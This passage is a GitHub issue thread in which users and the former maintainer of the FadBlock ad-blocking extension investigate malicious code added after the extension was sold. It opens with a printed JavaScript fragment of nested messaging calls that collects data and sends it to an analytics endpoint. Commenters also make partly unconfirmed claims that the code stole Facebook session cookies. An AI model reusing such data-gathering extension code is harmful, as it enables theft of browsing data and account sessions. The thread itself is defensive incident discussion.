            const cache = element;
            chromeAPI.runtimeAPI.sendMsg(
              {
                action: "fad-action-json",
                url: document + isXMLDoc,
              },
              function (element) {
                let result = element.data;
                chromeAPI.runtimeAPI.sendMsg(
                  {
                    action: "fad-action-json",
                    url: documentElement + isXMLDoc,
                  },
                  function (element) {
                    let document = element.data;
                    chromeAPI.runtimeAPI.sendMsg(
                      {
                        action: "fad-action-cf",
                        url: variableF1,
                        querySelectorAll: variableF2,
                      },
                      function (element) {
                        let cfData = element;
                        chromeAPI.runtimeAPI.sendMsg(
                          {
                            action: "fad-action-analytic",
                            url: divider,
                            pl: {
                              length: index,
                              remainder: isXMLDoc,
                              querySelectorAll: cache,
                              support: result,
                              element: document,
                              documentElement: ownerDocument,
                              matches: length,
                              unsupportedSelectors: matchesSelector,
                              index: matches,
                              newResult: cfData,
                            },
                          },
                          function (element) {
                            chromeAPI.localStorage.local
                              .set({
                                youtubeData:
                                  JSONParser.stringify(ownerDocument),
                              })
                              .then(() => {});
                          },
                        );
                      },
                    );
                  },
                );
              },
            );

Where

  • variableGz = fad18
  • variableGo = fad14
  • variableGi = fad15

The thing is, from https://fadblock.pro/check/extension, that stops at fad12, so there is a world where this request returns more stuff.


I think the easiest way is to execute this app in sandbox and analyse requests. Or maybe we just don't care.

from fadblock.

DennisGHUA avatar DennisGHUA commented on June 12, 2024

You should probably also steer clear of this extension: Adblock for Youtube™. It isn't the Fadblock extension; it is a separate extension which works differently with 10M+ users. It uses the same icon and it also requires invasive permissions for every website.

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

I completely understand, @JaielZeus, in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users. Maintenance had become challenging, and I envisioned FadBlock evolving into a robust full-blown ChatGPT-powered powerhouse, capable of generating transcripts, language translation, and more, with significant potential…and I didn't have the time to tend to it.

I did all this solely because of the few people who supported this project, whether monetarily or emotionally amid all the negativity, and I couldn't leave you all hanging. This isn't about seeking forgiveness or anything, I just see it as my duty.

from fadblock.

christian100kodehode avatar christian100kodehode commented on June 12, 2024

This is so bad, first selling us "life time" keys, then selling the software to an unknown third party??

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

@christian100kodehode, in the memo, the licenses were to be retained - which they still are - but I never thought they would try to package the extension into malware.

I have published a new version - replicated the whole database so that lifetime users can log in effortlessly again without any re-payment hassles or even reaching out for troubleshooting.

I am also planning to open-source the current version's codebase and reverse the open-core status. I am very sorry for all the commotion but I never expected any of this. The support was bare-minimum and I wanted to hand it off so it could evolve into something even bigger and better. :/

@fabriziocarloni, I think so, as you can see here on the thread, I and @poka-IT both came to the same conclusion while independently investigating.

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

As said previously, I am in no way saying it's not uploading anything, it was @poka-IT who deep-dived and uncovered the requests, it's better to switch out, and have a security audit of our accounts - I did the same.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@0x48piraj What I would like to know for sure is what data is really sent to the fadblock.pro domain, in addition to the history of sites visited and, I think, the cookies of active sessions. I would like to make sure that nothing else is sent, such as credentials stored in Chrome or anything else.
Please, is there anyone among us who can do an in-depth analysis to definitively clarify this thing? I think knowing this is very important for all of us.

from fadblock.

twer1775 avatar twer1775 commented on June 12, 2024

@0x48piraj Hello, may I ask if it's possible for you to delete the registry key from the Windows Registry Editor or remove the specific string from the registry within the browser? Thank you for your efforts.

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

Yeah, knowing the impact would help a lot @fabriziocarloni. As @poka-IT investigated, he ran and saw the outgoing/incoming requests and it seems like it doesn't exfil anything as of now. I found the same thing when I let it run in a separate profile. And there have been no new updates since the 24th.

I'm reading the code you provided, and I don't see any malicious code on my side. External requests are only made to https://fadblock.pro/check/extension, just fetching data; it doesn't seem to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics, as you said. Probably logging the IP address, that's it. But I'm just a Linux sysadmin, not a security expert; maybe I missed something.

@twer1775, I don't understand, what registry key? I don't think Windows Registry keys come into the scope of this project.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@0x48piraj and @poka-IT I analyzed the computer where the extension with the malicious code was installed and I came to the conclusion that this extension most likely caused the hack. But please, I would like your help in finding concrete evidence because it could also help everyone else who has installed it. I don't think it's a coincidence that a few days after having given permission to read and modify all the data on all the websites we were hacked on Facebook. I really hope I'm wrong but I don't think so.

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

@fabriziocarloni, I have submitted the malicious bit to various AV sandboxes - since I haven't delved into extensive JS reverse engineering before, it's taking some time to grasp the code. If anyone is willing to help, please feel free to contribute.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

Thanks @0x48piraj, I hope someone of good will wants to contribute to helping us understand what this extension really does. I see it as a challenge. I am not a security expert, and if no one wants to help us discover the truth, as soon as I have time I would like to try installing this extension with malicious code in a sandbox and, with Wireshark, try to analyze the data traffic towards fadblock.pro. For me it is important to understand it.

from fadblock.

seebeedub avatar seebeedub commented on June 12, 2024

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@seebeedub If they have inserted malicious code that sends cookies with username and password to their servers I don't think they will ever be honest.

from fadblock.

mnapoli avatar mnapoli commented on June 12, 2024

The "sell licenses then resell the software shortly after" was a bad move IMO. Then unfortunate things happened, that's bad.

But thank you for handling things as best as you could have done after the bad things happened. Warning users, re-uploading the extension, and preserving licenses, was the hard but right step. I'm sure it wasn't easy for you, thank you.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@0x48piraj This should be reported to Google to have the extension with the malicious code removed immediately. It cannot be left so downloadable by everyone. Please do everything you can to have it removed.

from fadblock.

JustinGITUB avatar JustinGITUB commented on June 12, 2024

How to completely uninstall fadblock or fadblock original?
Thanks for the advice.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@JustinGITUB To completely uninstall fadblock just remove this extension from chrome.

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

@fabriziocarloni, I have emailed everyone who supported to report the extension days before.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@0x48piraj I did my part by demonstrating that that malicious code doesn't just send the Chrome history but does something more important by sending cookies from active sessions on Facebook to then easily hack the accounts. But now it's up to you to do everything you can to get Google to remove it from its Chrome Web Store. I don't want what happened to us to happen to others.

from fadblock.

Nicos18 avatar Nicos18 commented on June 12, 2024

@fabriziocarloni In the last few days I was receiving several emails on different occasions because someone asked to reset my password (not me).

Maybe the 2FA on my account avoided the issue.

Is this connected to the extension, or could it be something else?

Uhm...

from fadblock.

Rynn21 avatar Rynn21 commented on June 12, 2024

I disabled the extension over a month ago because it was repeatedly asking for a donation. Today Chrome comes up with this, so I deleted the extension entirely. AdNauseum is so good. Haven't looked back for a while. Fadblock has been sketchy from the start.
(Screenshot of the Chrome warning, 2024-02-05)

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@Rynn21 I'm glad that Chrome finally sees this as an extension that contains malware. I just hope they delete it from the Chrome Web Store as soon as possible otherwise it will continue to cause damage.

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

It appears that the version of fadblock with malicious code has been removed from the Chrome Web Store (see https://chromewebstore.google.com/detail/fadblock-friendly-adblock/mdadjjfmjhfcibgfhfjbaiiljpllkbfc). I hope it's not a coincidence and that it's true.

from fadblock.

Rynn21 avatar Rynn21 commented on June 12, 2024

No one should install anything named Fadblock again. Change your passwords too.

from fadblock.

WongIong avatar WongIong commented on June 12, 2024

What can we do right now? Does changing your password also invalidate your cookies?
@fabriziocarloni

from fadblock.

Rynn21 avatar Rynn21 commented on June 12, 2024

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

Yes. A lot of people online are sharing the extent of how sketchy the extension was and is, including things about the author.

from fadblock.

moemisaka9 avatar moemisaka9 commented on June 12, 2024

Does the malicious code do anything on websites other than Facebook? If I didn't use Facebook at all before I uninstall the extension today should I worry about anything?

from fadblock.

fabriziocarloni avatar fabriziocarloni commented on June 12, 2024

@moemisaka9 It was certainly active in stealing session cookies from Facebook. However, I don't rule out that it was also active for other sites that I didn't have the opportunity to test.

from fadblock.

SAABoy avatar SAABoy commented on June 12, 2024

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.
(screenshot)

from fadblock.

Rynn21 avatar Rynn21 commented on June 12, 2024

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

Positive.

from fadblock.

That1BlueMew avatar That1BlueMew commented on June 12, 2024

@Rynn21 Oh, I sent one item here and deleted it because I thought it was not needed here, if that's what you're talking about.

from fadblock.

Panadoc avatar Panadoc commented on June 12, 2024

Any news on what data/sites were compromised? (other than Facebook)

from fadblock.

Rynn21 avatar Rynn21 commented on June 12, 2024

@Rynn21 Oh, I sent one item here and deleted it because I thought it was not needed here, if that's what you're talking about.

It was someone else, but they probably deleted their chain of replies.

from fadblock.

MGuerrera avatar MGuerrera commented on June 12, 2024

@0x48piraj have you finished inspecting the code?
Are there any other websites we should be worried about besides Facebook and Instagram?

from fadblock.

MGuerrera avatar MGuerrera commented on June 12, 2024

@0x48piraj have you finished inspecting the code? Are there any other websites we should be worried about besides Facebook and Instagram?

@0x48piraj I need to have an answer, the threat is serious.

I need to know if I have to start changing dozens and dozens of passwords.

from fadblock.
